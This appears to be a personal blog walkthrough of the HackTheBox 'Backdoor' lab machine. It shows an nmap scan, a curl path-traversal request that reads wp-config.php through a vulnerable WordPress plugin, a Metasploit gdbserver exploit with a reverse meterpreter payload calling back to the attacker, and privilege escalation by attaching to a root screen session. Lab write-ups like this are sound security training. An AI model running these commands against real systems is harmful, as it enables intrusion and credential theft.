Backdoor — Hackthebox Walkthrough

This was a box that I didn’t like that much. It felt a little too CTF’ish to me. Despite that, I learned some cool things.

User

Nmap revealed 3 ports.

nmap -p- -sC -sV -A --min-rate=400 --min-parallelism=512 -vv backdoor.htb

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
|   256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIuoNkiwwo7nM8ZE767bKSHJh+RbMsbItjTbVvKK4xKMfZFHzroaLEe9a2/P1D9h2M6khvPI74azqcqnI8SUJAk=
|   256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB7eoJSCw4DyNNaFftGoFcX4Ttpwf+RPo0ydNk7yfqca
80/tcp   open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.8.1
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
1337/tcp open  waste?  syn-ack
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Looking at the webserver on port 80, it was a wordpress site.

So I thought of running wpscan to see if there were any vulnerabilities that we can exploit. But it didn’t find anything. So I had to manually go and enumerate it. And I saw “ebook-download” plugin was installed.

With a quick google search I was able to find that this was vulnerable to LFI.

Offensive Security's Exploit Database Archive

As mentioned in the POC, I tried to include wp-config.php and it worked.

curl 'http://10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php'

With this I tried to include files that I though were important but I couldn’t find anything interesting. Then I remembered that the port 1337 was open. I didn’t know what service was running on that port. So I though of looking what process in running that service and seeing what that service is.

For this I made a little python script that will fuzz the running process ids and look at what command is running that process.

python3 proc-fuzz.py > proc
cat proc|uniq

With this I was able to identify gdbserver was running in port 1337.

And I was able to find a Metasploit module to exploit this.

GDB Server Remote Payload Execution - Metasploit - InfosecMatter

Following this article, I was able to exploit this and get a meterpreter instance.

sudo msfdb run
use exploit/multi/gdb/gdb_server_exec
set payload linux/x64/meterpreter/reverse_tcp
set RHOST 10.10.11.125
set RPORT 1337
set LHOST tun0
set LPORT 1234
run

Root

Running linpeas as the “user” user I saw screen was running which is a virtual screen-manager.

This stated that there was a screen session running as root named “root”. Also the screen binary was a SUID as well.

So I was able to attach to that screen session and get into a root shell.

screen -x root/root

Rooted!!!

“If you have any questions, make sure to leave them down in the comments, or contact me through social media.”

Email — iamkavigihan@gmail.com
Instagram — https://www.instagram.com/_kavi.gihan/

Happy Hacking !!! 😄